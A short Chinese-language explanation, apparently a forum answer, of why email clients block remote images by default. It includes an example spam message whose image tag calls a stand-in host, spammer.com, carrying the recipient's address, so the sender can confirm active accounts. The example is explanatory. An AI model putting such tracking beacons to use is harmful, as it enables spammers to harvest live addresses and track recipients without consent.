不在电子邮件中显示图像更多的是您的电子邮件客户端采用的反垃圾邮件策略(现在大多数人都默认这样做)。
例如,如果我要查找一堆活动的电子邮件帐户,我可以使用以下格式随机发送邮件:
to: john@doe.com message: <img src="http://spammer.com/verifyAccount.png?account=john@doe.com">
然后我可以设置我的Web服务器 spammer.com 记录收到的请求(同时提供图像),这样每次用户打开我的一封恶意电子邮件时,我都可以确定用户是否处于活动状态,这样就可以避免在不活动或不存在的帐户上浪费我的资源垃圾邮件。
但同样,它是关于政策问题,而不是安全威胁,对于电子邮件可能尝试加载的任何外部资源(例如样式表)也是如此。
JS通常甚至不能在邮件客户端中使用,因此也没有来自该方面的真正威胁。